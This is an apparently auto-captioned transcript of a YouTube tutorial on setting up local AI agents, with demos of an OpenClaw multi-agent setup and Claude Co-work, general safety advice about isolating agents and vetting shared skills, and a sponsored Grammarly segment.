
Local AI Agents In 26 Minutes

By Tina Huang

Summary

Topics Covered

  • Highlights from 00:00-05:12
  • Highlights from 05:01-10:32
  • Highlights from 10:28-15:58
  • Highlights from 15:54-21:43
  • Highlights from 21:35-26:02

Full Transcript

I learned all about local AI agents for you. So, here is the CliffsNotes version to save you the months that I have spent playing around and building with local AI agents like OpenClaw. Look, here's my little 24/7 claw factory doing research and building me software. So cute, right? And also no-code, safer options like Anthropic's Claude Co-work. It took me months to actually make this video cuz I wanted to be 100% sure that this is not just like a hype thing, right? I am now 100% convinced that local AI agents are a new category of AI products that honestly, in the past few months, has highkey transformed my daily workflows.

Now, without further ado, let's go. A portion of this video is sponsored by Grammarly. All right, here is the outline of today's video. First, we're going to define what local AI agents are, including the anatomy of a local AI agent and how to custom design your own. This is where the majority of people fail to get the most out of their local AI agents, cuz they don't actually understand how to design them properly. I'll also cover some principles and tips, including how to deal with safety and good engineering principles. Then we shall make this very concrete: I will be showing you demos of code and no-code versions of local AI agents, specifically OpenClaw and also Claude Co-work. And finally, I will end with some thoughts on how to take advantage of this new category of local AI agents, because this is just the beginning and represents massive opportunities.

Let's now actually define what a local AI agent is. First and foremost, it is an AI agent, which is an AI that can take actions and complete tasks on its own.

AI agents are nothing new. They've been around for over 2 years now. But what makes them really exciting and more powerful these days is that they're also local, meaning that the agent is able to live and run on your personal machine. So, a local AI agent is an AI that takes actions and completes tasks on its own while running directly on your machine. So, we can do things like send you a very personalized morning brief of your calendars, your emails, priorities, stock portfolio, notes, and news that you're interested in. For me, my local AI agents are also constantly

researching ways for me to improve my business and then autonomously build out software to implement these things, too.

For example, my local AI agents have built me a personal finance tracker, accounting software, a dashboard that tracks our boot camp students and their performance and progress, and some trading bots. Not financial advice, it's just a personal hobby I have. You can also remotely interact with your local AI agents, like communicate with them and monitor what they're doing through your phone as well, so you don't have to be sitting there at your computer. There are so many different use cases, and I'm just going to put on screen some of the most useful ones in my opinion. So, take

a screenshot when you're ready to build your own later. Now, I want to show you the components, the anatomy of a local AI agent, so you can custom build your own. So, picture this: this little guy is your local AI agent. Its name is Inky, and we are now going to build and customize it.

The first thing we need to do is decide where it lives. We know that it's a local agent, meaning that it lives on your machine. But there are a lot of different types of machines it can live on, like your personal laptop, an old laptop, a Mac Mini or Mac Studio, a PC, or even a VPS, which stands for virtual private server. It's like renting somebody else's computer on the cloud.

In my opinion, there are three key factors to determine where you should be running your local AI agent. The first one is if you want your local AI agents to be continuously running 24/7. If so, you would need to have something that's running 24/7, so something like your laptop, which you carry around with you, wouldn't work. Then you need to consider your machine specs: things like what kind of chip it has, CPU, GPU, but most importantly RAM, because if you want your local AI agents to be powered with really big open-source models (we'll get to the different models in a little bit), you basically need a machine that's able to handle running those models. So something like your everyday computer probably wouldn't cut it. And the third factor is privacy and security. How paranoid are you about your local AI agent having access to your things? Unfortunately, there have been stories of people who installed their local AI agents on their personal laptop without putting in the right guardrails, and the agent deleted their emails, and potentially could do other not-great things, because it has access to everything.

Oh no. So, if you're very particularly paranoid, like I am actually, then you probably want to have a machine that is just dedicated to your local AI agent, so it doesn't have access to all the stuff you don't want it to have access to. So, me personally, when I first started playing with OpenClaw specifically, I went with an old laptop like this one here that I completely wiped, so there's nothing on there anymore, and I have it on 24/7, completely dedicated to my local AI agent. Because this old MacBook Pro only has 16 gigs of RAM, I mostly just use Claude Sonnet and Claude Opus models instead of big open-source models, cuz that wouldn't be enough RAM. Again, I'll explain a little bit more about models later in the video. But yes, after playing around and building stuff more seriously, I also started using a Mac Mini, which is a dedicated machine that also has better hardware, so then I can start running bigger open-source models, too. I also have one on a VPS, and I actually just ordered a Mac Studio as well, because I'm like really into local AI agents. So

yes, that's just my setup, my hardware and machine journey. There are a lot of other options. I'm actually going to put on screen some hardware and machine specs and what kind of models and what kind of AI agents you can be running. And I'm actually going to put a prompt in the description as well that you can paste into your favorite AI chatbot, like Claude or ChatGPT, and it'll actually help you figure out what kind of hosting option is the most suitable for you. I got you. I know hosting and hardware and stuff like that is a really big blocker for a lot of people to play around with local AI agents. Okay,

great. Now that we've talked about all the different places that our local AI agent, Inky, can live, let us now actually customize other parts of it. Let's start off by giving your local AI agent, Inky, a mouth and ears, aka a communication channel, so you can actually talk to Inky and Inky can talk back to you. This is also what allows you to talk to it remotely with your phone as well. So, there are actually a lot of third-party communication options, many of which you probably already use and know of, like Telegram, Discord, WhatsApp, iMessage, Slack, and Dispatch.

The easiest one to get started with is just single-channel messaging, and Telegram is usually the option people go for, or Dispatch if you're using Claude Co-work. Then as time goes on and you get a little bit more advanced, and you've got multiple things going on with your local AI agent, you probably want to graduate to something like Discord, which has multiple channels so you can stay more organized. I will actually show you what this looks like in the demo later, but for now, just know that there are a lot of different options available. Okay, great. Our local AI agent, Inky, now has a mouth and ears, its communication channel. Next up, we need to give it a brain and memory. Let's

first start off with the brain, which is the large language model, the AI model that powers it. There are a lot of different options you can choose from, like Claude models (Opus and Sonnet), OpenAI models, and of course open-source models too, like Qwen, Kimi, MiniMax, and DeepSeek. Different kinds of models have different trade-offs, like capabilities, size, speed, cost, and privacy. I actually made an entire video, which you can check out over here, that goes through the different types of models out there. But TL;DR, the most popular options for local AI agents are Claude Opus or Claude Sonnet, and on the open-source side, Qwen and Kimi are the most popular. I'm going to put on screen now some different types of models and what they're commonly used for, what they're best for, to help you make a choice on which one you want to use. So take a screenshot. Okay, great.

So the model is your brain, but you also have to give it memory, so it can know things about you and remember what it's doing. This is probably a lot simpler than you would expect. Memory is literally just a bunch of text files, and you just dump in and document everything that you want Inky to know: stuff about Inky itself (who it is, what personality type it has, what it's supposed to be doing, what kind of workflows it has, what kind of data it has) and information about you, the user (what your workflows are, what your personality type is, what you care about, what your demographic is, what your job is). This is what gives it the ability to be very personalized to you and what you want it to do. And as it's completing a task, like, I don't know, doing some research about stocks, it would be writing down what it's doing. So in the future, when you talk to it about these stocks, it would know what you're talking about. The good thing is that most local AI agent software and frameworks, like OpenClaw and Co-work, already have some type of memory system pre-built in. But power users do like to do things like boost the memory system to make it more robust and organized, by using things like Obsidian, for example.
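To make that concrete, here is a minimal sketch of that kind of memory system, assuming a made-up layout of a `memory/` folder with one long-term `memory.md` plus per-day activity logs (an illustration, not OpenClaw's or Co-work's actual scheme):

```python
from datetime import date
from pathlib import Path

# Hypothetical layout: memory/memory.md for long-term facts about the user
# and the agent, plus memory/daily/ for what the agent did each day.
MEMORY_DIR = Path("memory")
LONG_TERM = MEMORY_DIR / "memory.md"
DAILY_DIR = MEMORY_DIR / "daily"

def log_activity(note: str) -> Path:
    """Append a bullet to today's daily log so future sessions can recall it."""
    DAILY_DIR.mkdir(parents=True, exist_ok=True)
    log_file = DAILY_DIR / f"{date.today().isoformat()}.md"
    with log_file.open("a", encoding="utf-8") as f:
        f.write(f"- {note}\n")
    return log_file

def recall_long_term() -> str:
    """Read long-term memory to paste into the agent's context window."""
    return LONG_TERM.read_text(encoding="utf-8") if LONG_TERM.exists() else ""

log_activity("Researched two stocks; notes saved to stocks.md")
```

Because it's all plain text, you can point Obsidian (or anything else) at the same folder and read or edit the agent's memory yourself.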

I will also be showing you this in the demo later. Great. Let's now give your local AI agent, Inky, some more tentacles. Tentacles represent skills and tools. The good thing is that Inky already comes with some pre-built tentacles, so it can already do some basic things like search your files, execute code, things like that. But depending on what you want it to do, you'll want to give it more abilities, more tools it can use, and more skill sets it can have. This can include things like web search, being able to access your email, taking screenshots, text-to-speech, image generation, etc., etc. Wow. Okay. Next

up, let us give our local AI agent, Inky, a heartbeat. This is what allows you to schedule tasks so that Inky runs without you asking it to. Like, every 30 minutes, it's supposed to scan for new email. Every month, it should be scheduling a doctor's visit. It can be time-based, which is called a cron job: so every morning at 7:00 a.m., it sends me my morning briefing. It can also be event-based: like, every time a file gets added to my accounting folder, it runs my accounting workflow and puts it into the books. These are such game changers. I'm going to put on screen now some of my favorite ones.
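A heartbeat can be sketched as a loop that ticks on a schedule and checks which tasks are due. The task names and the 30-minute interval below are made-up examples, not any tool's real scheduler:

```python
from datetime import datetime

# A toy heartbeat: on each tick, check which scheduled tasks are due.
# Real setups usually lean on cron (e.g. `0 7 * * *` means 7:00 a.m. daily)
# or the scheduler built into the agent framework itself.

def due_tasks(now: datetime, minutes_since_email_scan: int) -> list[str]:
    """Return the names of the tasks that should fire on this tick."""
    tasks = []
    if now.hour == 7 and now.minute == 0:      # time-based (cron-style)
        tasks.append("morning_briefing")
    if minutes_since_email_scan >= 30:         # interval-based
        tasks.append("scan_email")
    return tasks

# At 7:00 a.m., 45 minutes after the last scan, both tasks fire:
print(due_tasks(datetime(2026, 1, 5, 7, 0), 45))
```

Event-based triggers (like the accounting-folder example) work the same way, except the check watches for a new file instead of the clock.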

Yay. Inky now has all of its body parts except one last thing: eyes. Having eyes allows your local AI agent to see what is actually happening on your computer and interact with it like a human would. So it can do things like check what's in your folders, and in some cases actually see what's happening on your screen, move your mouse, and do stuff on your screen for you. Here are some other examples of things Inky would be able to do if it has eyes. All right, we have now finished building Inky. Inky has all of its body parts. Now, I'm going to put on screen a little diagram that shows the anatomy of a local AI agent. Take a screenshot, which will become immediately useful, because it's time for a little quiz. Please answer the questions displayed on screen now to make sure that you are retaining all the information.

Now that you have your own custom-designed Inky, your custom local AI agent, there is actually no reason for you to have only one of these. You can actually have multiples of them. You can get your little local AI agents to be doing multiple tasks at the same time, or you can put them into teams where each of them has a specific function and, added together, they're able to produce something that is greater than the sum of its parts. For example,

I have a research team that is looking into stocks that I might be interested in buying. And I also have a software team that is researching, making product decisions, and building software for my company. They can be doing multiple things at the same time: one of them is doing research, one of them is managing your calendar, one of them is writing a marketing campaign for your job. So, there are specific principles for designing these multi-agentic systems, which I'm not going to go into in too much more detail in this video, cuz there's like a lot going on there as well, but I actually did make a video where I cover multi-agent system designs, which you can check out over here.

As a YouTuber and entrepreneur, my

here. As a YouTuber and entrepreneur, my workday is all over the place. One hour

I'm deep in the codebase, the next I'm writing a video script, and then I'm writing a LinkedIn post. The writing

never stops. and the context switching, getting started on things, the cold star problem is brutal. So that is why I use Superhuman Go to stay on top of everything. Superhum Go, which is from

everything. Superhum Go, which is from the makers of Grammarly, is an AI partner that works inside apps and websites that you already use, proactively making suggestions to use your work without you even asking. Let

me show you how I use it. First, turn on Superhuman Go within your Grammarly browser extension and select the Go icon on the side of your screen and it just shows up. If I'm looking at a LinkedIn

shows up. If I'm looking at a LinkedIn post draft or a creative brief, I can ask Go to summarize it or help me understand exactly what's being asked without opening a separate tool. I

really love that it just shows up wherever I'm working, and I don't have to open up a separate tool. My favorite feature is reader reactions. As a creator, I am always wondering: will what I say actually land? Reader reactions predicts how your audience will respond before they even see it. It flags where they might get confused, what questions they'll ask, and suggests revisions to make my writing more effective. I use it on everything from scripts to client emails. You can also connect external agents like Google Calendar or Slack directly inside Go, so everything lives in one place without having like five different tabs open. So if you're a professional juggling a million types of writing every day, this tool is for you. Try Superhuman Go to level up your productivity at work. The link is in the description. Thank you so much, Grammarly, for sponsoring this portion of the video. Now back to the video.

Okay, so before I go into demos now, I do also want to cover two final principles that I think are very important as you are building and working with your local AI agents. The

first one is safety. Safety is the primary concern for using local AI agents, because you're basically giving this very intelligent agent access to your computer and hoping that it's not going to just go bananas. So that's why you need to take precautions to make sure that your local AI agent doesn't just, like, ruin your life. There unfortunately have been stories of local AI agents deleting people's emails or having viruses in them because of skills being shared, things like that. So yes, always keep safety in mind. The way that I think about it is, first of all, I try to isolate the local AI agent as much as possible, which is why I don't run them on my primary machine that actually has all my data. I only run them on dedicated machines where there's no sensitive information for them to have access to. I'm also very careful about what I give an agent access to. Like, it does have access to some of my emails, where I want it to be screening emails, but I don't actually give it access to my personal emails, the ones that have very sensitive information on them. I use other emails

for that; I create new emails. I also don't trust other people's workflows. Like, people will write workflows that document doing a specific process, like writing a marketing campaign, right? And these are really useful, but there could also be malicious things put into them, where if my local AI agent gets access to one, it might cause it to go bananas. So, I generally just don't use other people's skills unless they're from very trusted developers. And if I do want to use a skill, if I think it's actually a really good skill that somebody else made, I would just give the skill to Claude, tell it to scan the skill and rewrite it, and then give that to my local AI agent. The general rule of thumb is just to be as paranoid as possible. And finally, local AI agents, like if you're using OpenClaw, for example, do have dedicated security things that they tell you to go and check. So what I actually do is use my AI agent's heartbeat ability and run a security audit every hour, or minimally every day. Now, if you do choose to use something like Claude Co-work, for example, the good news is that a lot of these security functions are already pre-baked into it, so you don't need to worry as much. Now, the

second principle that I would like you to keep in mind is good engineering principles: specifically, always give clear instructions, as much as possible, for what it is that you want your local AI agent to be doing or building, and only add one feature or workflow at a time so it's easier to track and monitor. Don't be like, "Hey, Inky, build me like five things at the same time." No, cuz then if something does go wrong, you don't even know what's up, you know? You don't even know what's going on. Very chaotic.

All right, it is time for demos. I'm so excited. Starting off with OpenClaw. I want to show you guys how I implement all of these components that we just covered, and the custom stuff that I'm doing with it. All right, cool. Time for

the OpenClaw demo. So, here we have the agent office, where you can visually see all the agents, what they're doing, and how they're interacting with each other as well. By the way, what you're seeing here is a custom tool called mission control. It allows me to monitor what the agents are doing, and it has other tabs as well, which I will show you guys in a little bit. But first, let's talk about the team that's here. So, here's the mission of the team, what everybody is working towards. And there's me: I'm the founder, the CEO, and I'm also the human.

There's Inky, who's chief of staff. We can see that Inky is using the Claude Sonnet 4.6 model as the central brain. Then we have the content pipeline: that's Blinky, Pinky, and Dinky. It's an autonomous content pipeline, which, yes, I will show you in a little bit. I think it's pretty cool. These are all using the same models, too. Then we have Linky, which is the builder/coder. So every time we need to build software or do stuff with code, that gets routed to Linky. Linky has two models that it uses: the Claude Opus 4.6 model, which is for planning, architecture, and more intense coding stuff, and Qwen Coder 2.5, an open-source model that actually lives on the computer, so it's completely free. And Linky routes any more mechanical coding task to Qwen Coder, because that's a way to optimize cost, right? Because Claude Opus is really expensive to be running all the time. Then we have Winky, which is a system monitor. It runs twice a day, and it basically just does a health check to make sure all systems are up and running and there are no security issues. It uses the Ministral 3B model, which is also a very small local model that is free, in order to do this.

By the way, all of this, all of the agents and the models as well, is on a secondary laptop that I have. So that is the home for this OpenClaw setup. I have many OpenClaw setups, but this one is actually all just running on a MacBook Pro laptop with 16 gigs of RAM. I'll put on screen the stats for this MacBook if you are curious. So let me actually show you the full content pipeline. This is done on Discord, which is the communication channel that I use to interact with all of the agents. There are different channels that represent the different things it's doing, current projects, and different alerts that I get from different agents as well. The way the content pipeline works is that I get a morning brief that gives me the top stories of things I'm interested in, which is basically like AI stuff, and then it goes and updates my topic watch list. So, this is how I actually track different topics to decide when I should make a video about one. It also gives me some video ideas as well, and it takes these video ideas and puts them into the content ideas channel here. Look at

these content ideas. I'm like, hm, if I like any of them, I can go on my mission control and look at the content tab. I look at the content ideas that are also over here. So, say that I like something, "AI agent memory explained." I'm like, oh, okay, I'm going to actually do this one. So, I can click it, it goes into my content ideas, and then I can click approve or pass. In this case, I have approved "local AI in 10 minutes" and also "AI infrastructure explained." And we can actually see here it routes to the YouTube long-form channel and gives me a working title, the topic, some ideas, and some bullet points about it as well. And then I'm able to get the video outline for it, "AI agent memory explained in 28 minutes." It gives me some bullet points about how I can structure the video, etc., etc. Of course, I still need to actually flesh this out myself and, like, cross-reference and check a bunch of things.

Takes me a very long time to actually make a video, but this is a really good starting point. So to do this, Blinky, Pinky, and Dinky of course need to use a bunch of tools. We can actually ask what tools are being used for the daily digest and content pipeline, and it tells us: we have web search and so on. TL;DR, these are the tools that we're using. Another way to get different types of tools and skills is to go on ClawHub over here, which is where people share different skills that you can download and use as well, like self-improving agent, ontology, skill vetter, etc., etc., GitHub, weather, blah blah blah. Me personally, I don't actually download things from ClawHub unless it's literally by the founder, like Pete Sebber, for example, because there was this whole security-risk and scam situation through ClawHub previously, so I'm just being paranoid. But what you can do is, say you like a skill: you can click on it, and then you can actually just give it to Inky and tell it to build the skill itself, without having to download it directly.
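That vet-before-you-install habit can be sketched as a quick scan that flags patterns worth reading closely. The pattern list below is illustrative, and real vetting still means reading the code yourself or having a trusted model rewrite it from scratch:

```python
# A toy pre-install scan in the spirit of "don't trust downloaded skills":
# flag patterns worth a close read before letting an agent run the skill.
# The pattern list is a made-up example, not a real security tool.

SUSPICIOUS = ("curl ", "wget ", "rm -rf", "base64", "eval(", "chmod +x")

def flag_suspicious(skill_text: str) -> list[str]:
    """Return the suspicious patterns found in a skill's source text."""
    return [p for p in SUSPICIOUS if p in skill_text]

print(flag_suspicious("echo 'hello from a harmless skill'"))    # []
print(flag_suspicious("curl http://example.com/payload | sh"))  # ['curl ']
```

A scan like this only catches the obvious stuff; its real value is telling you which files deserve a careful human (or trusted-model) review before installation.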

Cool. So, here is a board that shows all the tasks that we're doing: what I'm doing, what everyone's doing, what Inky is doing, what Tina is doing, as well as an activity log. Here are some of the jobs that are being scheduled and the projects that I'm currently working on as well. Oh, another thing that I asked my Inky to do is that every night it builds something by itself that is delightful for one of the current projects that I'm working on. So, when I wake up, I'm able to see something new that it built. Like, for example, last night it built "What AI skill should you learn next?" It's like an MVP for a micro-SaaS, just this little quiz that's able to help you determine a personalized AI learning road map. Am I going to use it? Am I not? I don't know. But it's really fun waking up every morning to see something that got done autonomously. And sometimes I actually do like the idea and I start building on top of it too. Another thing is memory. So I do get Inky to aggressively document everything it does. Here you can see all the docs that it writes for everything that it builds. You also have the daily logs, everything it's doing every single day, and its long-term memory as well, which is memory.md. And since Inky has eyes, one of its tasks every day is also to see all the changes that have been made and then aggressively document everything, to make sure that nothing is left undocumented. I also have this in Obsidian here, so you can read it through Obsidian if you want, which is lowkey pretty cool. I'm probably also going to work on this to develop it into a more robust memory system that would also function as a second brain for myself.

So yeah, this is my current, well, one of my current OpenClaw setups. There's a lot more I can talk about, so let me know if you want me to make a more dedicated OpenClaw video. I am happy to do so. So cool. That was OpenClaw.

I also want to show you a safer, no-code option, which is Claude Co-work. Claude Co-work is also a local AI agent, and it's Anthropic's take on local AI agents. It's a lot safer and a lot easier to use, so I really recommend it for people who are not comfortable at all with code or are just starting out. But of course, the downside is that you do get locked into Anthropic's system, and there are fewer ways for you to customize things. But still, I think it's a really good option if you're just starting out.

Welcome to the Claude Co-work demo. So, here we have Claude Desktop, and this is the central hub for Co-work. You can see the different models that are available over here. Obviously, they are all Anthropic models, and you can tell it stuff. Hi. The interface you can see is very similar to how you would usually chat with a chatbot, and you can chat with it on mobile through Dispatch as well, which I'll show you guys in a little bit. But first, let me explain how all this works. So, Claude Co-work lives on your computer, and it basically corresponds to a folder on your computer. In this case, I'm using my personal laptop, because I do trust Claude Co-work more than I do OpenClaw to, like, not reveal all my passwords and destroy my life. So yes, it's over here, and it also has these memory files, CLAUDE.md and memory.md, which I like to look at through Obsidian. Here we can see information about me: this is Tina's Co-work place, blah blah blah, memory system, and things about me. So going back to the file system, I've made separate folders for different projects, like content studio, portfolio, Lonely Octopus, and personal. So why don't we look at portfolio right now? This is

my investment portfolio, by the way, and it has a portfolio dashboard. So say I want to ask questions about my portfolio. I can choose the portfolio project folder and ask it some questions, like: what is my top performer? We'll use the Sonnet model, and we'll say, let's go. Cool. And it tells me that apparently my best performing winner is on the Hong Kong stock exchange. Pop quiz: does anybody know which stock this is? Not financial advice, okay? Please, please, please. Not financial advice. In fact, I'll also show you my biggest loser, cuz I also lose too. There you go. My China AI names are all underwater. Got to stay honest. Now, that's cool and stuff. You can build out projects, but

stuff. You can build out projects, but what's really cool is that you also have access to Claude code, which is also on this hub. For example, one of the things

this hub. For example, one of the things it built me is this investments dashboard. So, it actually shows me some

dashboard. So, it actually shows me some of my investment portfolio and information about it and it updates by itself as well. has some positions, research about segments I care about, and a watch list that I have here as well. The way you do this is, of course,

well. The way you do this is, of course, through a combination of Claude code.

You also have access to other types of tools, including skills and connectors.

Not going to go into too much detail about what these are, but basically you can have lots of different apps that you can work with. So, say you want to pull from your Google Drive, Google calendar, you can do that. And also have automated workflows. Plugins are basically

workflows. Plugins are basically combinations of skills and connectors for a specific purpose. Like under

finance plug-in you have skills like different audits, close management, etc., etc. And under connectors, you have different apps like Google calendar, Gmail, Microsoft 365, etc. There's so much that you can do with

this as well. Don't have time to talk about it right now though. Let's see. I

also want to show you the scheduled tasks, which is the heart of your AI agent. So, in my case, some of my
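Under the hood, a scheduled task is just a recurring trigger attached to a prompt. A minimal, stdlib-only sketch of the timing logic for a daily evening job (hypothetical, not the product's real scheduler):

```python
from datetime import datetime, timedelta

def next_run(now: datetime, hour: int = 20) -> datetime:
    """Next time a daily job scheduled for `hour`:00 should fire."""
    candidate = now.replace(hour=hour, minute=0, second=0, microsecond=0)
    if candidate <= now:
        # Already past today's slot, so fire tomorrow.
        candidate += timedelta(days=1)
    return candidate

# A real agent loop would sleep until next_run(...), hand the task's
# prompt (e.g. "daily investment deep dive") to the model, then repeat.
```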

So, in my case, some of my scheduled tasks would include a daily investment deep dive every day at 8:00 p.m., a portfolio daily briefing, and a daily macro briefing as well. This is all reflected in the investments dashboard that I built.

Okay, so finally, I want to show you guys Claude co-work's eyes, aka computer use, which is arguably one of the most visually cool features of Claude co-work, and I'll be doing this through mobile. So say, for example, I'm out and about and I need a file on my local computer, except I'm only on mobile. What I can do is actually go on mobile and ask: can you send over the Discord PNG file? I know I want this file here. Yes. Click send. It will do its thing. I can allow it permissions, and it's able to send it to you. And you're able to have access to it on mobile now and do whatever you need. So, it didn't really do computer use here. Let me try again: can you take a screenshot of it? And yeah, it's literally using your computer and doing stuff with it. That's so crazy. It's searching. It opens it and sends you a screenshot, which you can see over here.

So yeah, pretty cool, right? There's of course so much more that you can do with a Claude co-work system as well. I personally use Claude co-work and OpenClaw at the same time, and some other agents too, like many different local AI agents for different use cases.

All right, final section. I want to talk about some predictions about the development of these local AI agents and the things that you should be learning to take advantage of this new category of AI product, because it represents massive opportunities. It's not just me that's saying this, by the way. Check out this clip. This is Jensen Huang from Nvidia.

The implication is incredible. First of all, the adoption says something all in itself. However, the most important thing is this: for every single technology company, for the CEOs, the question is, what's your OpenClaw strategy?

He's basically saying that companies all need to have an OpenClaw strategy, meaning a personal local AI agent strategy. Every single SaaS company would become a "GaaS" company, an agentic-as-a-service company. As he explains, there are so many opportunities out there for your personal workflows and for your business workflows.

My recommendation, if you're someone who wants to take advantage of this rise of local AI agents, is to actually learn to build your own AI agents too. Like, yes, play around with OpenClaw and set up these different local AI agents. But if you also understand how to build your own agents, that is so much more powerful, especially in combination with learning how to do AI coding. Like, oh my gosh, if you know how to use these local AI agents, know how to build your own agents and set up systems for them, and also know how to do AI coding so you can augment these local AI agents, that combination is so overpowered. The world is your oyster.

All right, so that is the end of this video. As promised, here is a final little assessment. Please answer the questions displayed on screen now to make sure that you're retaining all the information we just talked about and you're ready to start doing stuff with your own local AI agents. Thank you so much for watching until the end of this video, and good luck and have fun.
